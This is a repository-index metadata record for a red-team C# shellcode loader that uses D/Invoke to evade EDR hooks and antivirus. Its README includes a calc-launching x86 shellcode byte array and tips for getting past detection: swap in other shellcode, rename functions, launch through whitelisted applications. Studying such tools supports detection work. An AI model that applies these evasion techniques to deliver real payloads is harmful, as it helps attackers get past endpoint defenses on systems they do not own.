{"id":13841018,"url":"https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp","last_synced_at":"2025-07-11T10:30:43.733Z","repository":{"id":136106601,"uuid":"382256905","full_name":"Kara-4search/DInvoke_shellcodeload_CSharp","owner":"Kara-4search","description":"ShellCodeLoader via DInvoke","archived":false,"fork":false,"pushed_at":"2021-07-05T02:31:49.000Z","size":32,"stargazers_count":49,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-11-19T03:49:09.773Z","etag":null,"topics":["bypass","bypass-antivirus","bypass-windows-defender","csharp","dinvoke","redteam","shellcodeloader"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kara-4search.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2021-07-02T06:49:19.000Z","updated_at":"2024-10-16T03:27:59.000Z","dependencies_parsed_at":"2023-12-07T16:30:40.703Z","dependency_job_id":null,"html_url":"https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDInvoke_shellcodeload_CSharp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDInvoke_shellcodeload_CSharp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDInvoke_shellcodeload_CSharp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kara-4search%2FDInvoke_shellcodeload_CSharp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kara-4search","download_url":"https://codeload.github.com/Kara-4search/DInvoke_shellcodeload_CSharp/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225713021,"owners_count":17512538,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","bypass-antivirus","bypass-windows-defender","csharp","dinvoke","redteam","shellcodeloader"],"created_at":"2024-08-04T17:01:01.450Z","updated_at":"2024-11-21T10:31:18.636Z","avatar_url":"https://github.com/Kara-4search.png","language":"C#","readme":"# DInvoke_shellcodeload_CSharp\n\n\n\nBlog link: May not gonna update.\n\n* A ShellcodeLoader base on my another project(https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), inspire by TheWover(https://github.com/TheWover).\n* The purpose is to bypass EDR 's APIs hook, or danger APIs dectection.\n* Use D/Invoke to load shellcode into memory.\n* **I removed a lot of unnecessary code from the original project, make the code easy for understanding.**\n* You could change the function name or do other magic works make it better for EDR bypassing.\n* I only tested it on x86 with the shellcode below(It is a calc shellcode), but it should be able to work on x64.\n\n  ```c#\n  byte[] codepent = new byte[193] {\n                  \t0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,\n                  0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,\n                  0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,\n                  0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,\n                  0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,\n                  0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,\n                  0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,\n                  0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,\n                  0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,\n                  0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,\n                  0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,\n                  0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,\n                0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00\n  };\n  ```\n\n* You could use API monitor(http://www.rohitab.com/apimonitor) to test the project, comparing with the SimpleLoader(https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp), You could see there is no API call via D/Invoke.\n* Kernel functions are not good enough，you could even do the ntdll version of this.\n\n\n## Usage\n\n1. Just replace the shellcode.\n2. Launch it through some white list applications\n\n\n## Comparing via API monitor\n\nThere are mainly 3 APIs we are gonna monitor:\n\n* VirtualAlloc\n* CreateThread\n* WaitForSingleObject\n\n  \n1. You could see the picture below, the SimpleLoader' s API call caught by API monitor.\n   ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result1.png)\n\n2. And the **DInvoke ShellcodeLoader**'s API call was not caught by API monitor.\n   ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/APIMon-Result2.png)\n\n\n## Reference link:\n\n1. https://github.com/CCob/SharpBlock\n2. https://ethicalchaos.dev/2020/05/27/lets-create-an-edr-and-bypass-it-part-1/\n3. https://ethicalchaos.dev/2020/06/14/lets-create-an-edr-and-bypass-it-part-2/\n4. https://thewover.github.io/Dynamic-Invoke/\n5. https://offensivedefence.co.uk/posts/dinvoke-syscalls/\n6. https://github.com/TheWover/DInvoke\n7. http://www.rohitab.com/discuss/topic/38807-api-monitor-v2-r10-release-instant-monitoring-without-definitions-support-for-dllmain-and-early-apis-windows-8/\n8. https://vimeo.com/566964438\n9. https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread\n10. https://docs.microsoft.com/en-us/dotnet/api/microsoft.visualstudio.shell.interop.vsdebugstartupinfo.dwcreationflags?view=visualstudiosdk-2019\n\n","funding_links":[],"categories":["C# #"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FKara-4search%2FDInvoke_shellcodeload_CSharp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FKara-4search%2FDInvoke_shellcodeload_CSharp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FKara-4search%2FDInvoke_shellcodeload_CSharp/lists"}